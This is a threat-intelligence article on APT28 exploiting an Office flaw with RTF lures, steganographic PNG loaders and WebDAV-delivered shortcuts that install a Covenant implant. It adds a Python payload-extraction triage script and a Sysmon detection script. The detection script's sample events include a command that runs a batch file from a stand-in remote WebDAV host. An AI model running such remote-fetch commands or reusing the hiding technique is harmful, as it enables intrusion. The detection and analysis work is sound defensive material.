Security researchers have uncovered an espionage campaign by APT28, a Russia-linked group, that exploits a newly disclosed Microsoft Office vulnerability against users in Ukraine, Slovakia, and Romania.
The Vulnerability Details
The flaw is tracked as CVE-2026-21509 and carries a severity score of 7.8. It is a security feature bypass: a specially crafted Office file gets Office to perform actions its protections should block. Microsoft and outside researchers discovered and reported it, and APT28 was exploiting it within days of disclosure, with the first attacks observed on January 29, 2026. That short window is why prompt patching matters for affected users.
The phishing emails are written in English and in the targets' local languages, and their lures use convincing regional topics. The attachments are malicious RTF files that exploit the flaw to deliver the payloads described below.
The delivery servers are geofenced: malware is served only to requests that come from the targeted regions, and only when the request carries the browser header the attackers expect. A sandbox or an analyst fetching the URL from elsewhere gets nothing, which keeps the payload out of automated analysis. Anyone replaying the download therefore has to reproduce the original request's source region and headers.
Two Different Attack Paths
One path drops MiniDoor, an email stealer implemented as a C++ DLL. It collects messages from the Inbox, Junk, and Drafts folders and forwards them to attacker-controlled email accounts. Researchers link it to a known spyware variant.
The second path uses PixyNetLoader, a dropper that sets up a longer chain. Its later stages are embedded inside the dropper itself, among them a shellcode loader and a PNG image.
Advanced Payload Delivery
The loader checks its environment before doing anything. It activates only on what looks like a real victim machine, and in particular only when its parent process is explorer.exe, which is the case when a user launches it from the desktop or a shortcut. If any check fails, as in a sandbox that starts the sample directly, the malware stays dormant.
The shellcode is hidden inside the PNG by steganography. Once extracted and run, it loads a .NET assembly, a Covenant Grunt implant. Covenant is an open-source .NET command-and-control framework, and its Grunt gives the operators full remote control of the host.
Links to Earlier Campaigns
This chain matches an earlier APT28 operation. That campaign used VBA macros rather than DLLs as the entry point but kept similar techniques, among them COM hijacking and XOR-encrypted payloads.
Both campaigns deliver Covenant Grunt implants, and both hide the loader inside an image with steganography. The group is refining an existing toolchain rather than replacing it.
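The two building blocks that recur across both campaigns, a payload stashed in a PNG and XOR encryption, are easy to unpick once you walk the image's chunk structure. The Python below is an added example for this article, not code from the loader or from the researchers who analysed it. The report does not say how the data is embedded, so the private chunk type stEg, the single-byte XOR key, and the tiny PE-like payload are assumptions chosen so the script runs offline; a .NET assembly is a PE file, which is why the decoder looks for the MZ and PE signatures. The real loader goes on to map and run the shellcode; this stops at recovering and identifying the hidden file.

```python
"""Walk a PNG's chunks, pull out data hidden in a non-standard chunk or after
IEND, and undo a single-byte XOR using the PE header as known plaintext.

Added example for this article; the chunk type 'stEg', the key and the sample
payload are assumptions, not details taken from the campaign."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG spec; anything else is a candidate hiding spot.
STANDARD_CHUNKS = {b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tEXt", b"zTXt", b"iTXt",
                   b"tRNS", b"gAMA", b"cHRM", b"sRGB", b"iCCP", b"bKGD", b"pHYs",
                   b"sBIT", b"sPLT", b"hIST", b"tIME"}


def parse_chunks(data):
    """Return ([(type, body, crc_ok), ...], bytes_after_IEND)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, chunks = len(PNG_SIG), []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:end])
        chunks.append((ctype, body, zlib.crc32(ctype + body) & 0xFFFFFFFF == crc))
        pos = end
        if ctype == b"IEND":
            break
    return chunks, data[pos:]


def find_hidden(data):
    """Candidate blobs: non-standard chunks and anything appended after IEND."""
    chunks, trailer = parse_chunks(data)
    found = {ctype.decode("latin-1"): body for ctype, body, _ in chunks
             if ctype not in STANDARD_CHUNKS}
    if trailer:
        found["after_IEND"] = trailer
    return found


def xor(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(blob):
    """MZ header plus a PE signature at e_lfanew (offset 0x3c)."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def guess_single_byte_key(blob):
    """Known-plaintext guess: the decoded file must start with 'MZ'."""
    if len(blob) < 2:
        return None
    k = blob[0] ^ 0x4D                      # 'M' fixes the key ...
    return k if blob[1] ^ k == 0x5A else None  # ... and 'Z' must confirm it


def extract_assembly(png_bytes):
    """Return (where, key, plaintext) for the first blob that decodes to a PE, else None."""
    for where, blob in find_hidden(png_bytes).items():
        k = guess_single_byte_key(blob)
        if k is None:
            continue
        plain = xor(blob, bytes([k]))
        if looks_like_pe(plain):
            return where, k, plain
    return None


# --- constructed sample: a 1x1 PNG carrying an XORed fake PE in a private chunk ---
def make_chunk(ctype, body):
    return (struct.pack(">I", len(body)) + ctype + body
            + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF))


def build_sample_png(hidden, key):
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1 pixel, 8-bit RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")            # filter byte + one red pixel
    return (PNG_SIG + make_chunk(b"IHDR", ihdr) + make_chunk(b"IDAT", idat)
            + make_chunk(b"stEg", xor(hidden, key)) + make_chunk(b"IEND", b""))


# minimal MZ/PE skeleton standing in for the .NET assembly (constructed, not real malware)
FAKE_PE = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\xCC" * 16
KEY = b"\x5A"
SAMPLE_PNG = build_sample_png(FAKE_PE, KEY)

if __name__ == "__main__":
    where, key, plain = extract_assembly(SAMPLE_PNG)
    print(f"payload in {where}, key 0x{key:02x}, {len(plain)} bytes, PE={looks_like_pe(plain)}")
```

Image viewers ignore unknown ancillary chunks and anything after IEND, which is why both spots work for hiding data and why a triage script should check both. A multi-byte XOR key would need a longer known plaintext (the DOS stub text, for instance) instead of the two-byte MZ check used here.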
Ukraine's cyber incident response team also reported attacks in which APT28 used Word documents against officials, hitting more than 60 government email addresses. File metadata shows the documents were created on January 27, 2026.
Opening the lure makes Word fetch content from an attacker server over WebDAV, which delivers a Windows shortcut (.lnk) carrying malicious code. Running the shortcut starts the PixyNetLoader chain, and the Covenant implant ends up on the targeted system.
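Each step of that chain leaves a trace on the endpoint. As an added example, not detection content from the report, the Python below runs three checks over Sysmon-style process-creation and file-creation events: an Office application spawning a non-Office child, a shortcut file landing in the WebClient service's download cache, and a process started with a WebDAV UNC path (the \\host@80\share, \\host@SSL\share or DavWWWRoot forms Windows uses for WebDAV). The event records, the IP 203.0.113.10 and every path in them are constructed sample data, and the cache directory is assumed to be the default WebClient location.

```python
"""Flag the WebDAV-delivered shortcut chain in Sysmon-style events.

Added example for this article, not rules from the campaign's researchers.
Events are constructed (EventID 1 = process create, 11 = file create);
the IP 203.0.113.10 and all paths are sample data."""
import ntpath

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Windows spells WebDAV locations as \\host@80\share, \\host@SSL\share or a DavWWWRoot share.
WEBDAV_MARKERS = ("@80\\", "@ssl\\", "@ssl@", "\\davwwwroot\\")
# Where the WebClient service caches files it fetched (assumed default location).
DAV_CACHE = "\\tfsstore\\tfs_dav\\"


def base(path):
    return ntpath.basename(path or "").lower()


def has_webdav_path(text):
    t = (text or "").lower()
    return any(marker in t for marker in WEBDAV_MARKERS)


def classify(event):
    """Names of the rules that fire for one event (possibly none)."""
    hits = []
    eid = event.get("EventID")
    image, parent = base(event.get("Image")), base(event.get("ParentImage"))
    if eid == 1 and parent in OFFICE and image not in OFFICE:
        hits.append("office_spawns_child")
    if eid == 1 and has_webdav_path(event.get("CommandLine")):
        hits.append("process_references_webdav_unc")
    target = (event.get("TargetFilename") or "").lower()
    if eid == 11 and target.endswith(".lnk") and (DAV_CACHE in target or has_webdav_path(target)):
        hits.append("lnk_fetched_over_webdav")
    return hits


def scan(events):
    """(event index, rule) pairs for every rule hit, in event order."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


SAMPLE_EVENTS = [
    # benign: Outlook handing an attachment to Word
    {"EventID": 1, "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\u\AppData\Local\Temp\report.rtf"'},
    # the WebClient service writes the shortcut it fetched from the attacker's server into its cache
    {"EventID": 11, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\V-203.0.113.10\docs\report.lnk"},
    # the user runs the shortcut; its target lives on the WebDAV share
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd.exe /c "\\203.0.113.10@80\DavWWWRoot\docs\update.bat"'},
    # an Office process spawning a shell, a common tell for a document exploit
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "cmd.exe /c whoami"},
    # benign: normal logon
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The WebDAV UNC check is the most specific of the three: legitimate software rarely runs anything from a \\host@80\ path, so a hit there is worth an immediate look, while the Office-child rule needs an allow list for add-ins and updaters before it is quiet enough for production.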
Prevention Strategies
Organizations can cut their exposure with layered defenses. Apply the Office security update immediately, since the exploit was in use within days of disclosure. Keep Protected View enabled for files from the internet and for email attachments, block macros by default, and consider Office File Block settings that open RTF files only in Protected View. Where WebDAV is not needed, disable the WebClient service so a document cannot pull a shortcut from an attacker's server. Monitor for Office processes that spawn child processes or connect to unfamiliar hosts, and for shortcut files arriving from network locations, so the chain is caught early.
Train staff to treat unexpected attachments with suspicion, and filter RTF attachments and shortcut (.lnk) files at the mail gateway. Together these steps sharply reduce the risk from both the exploited vulnerability and the espionage implants it delivers.
Sleep well, we got you covered.

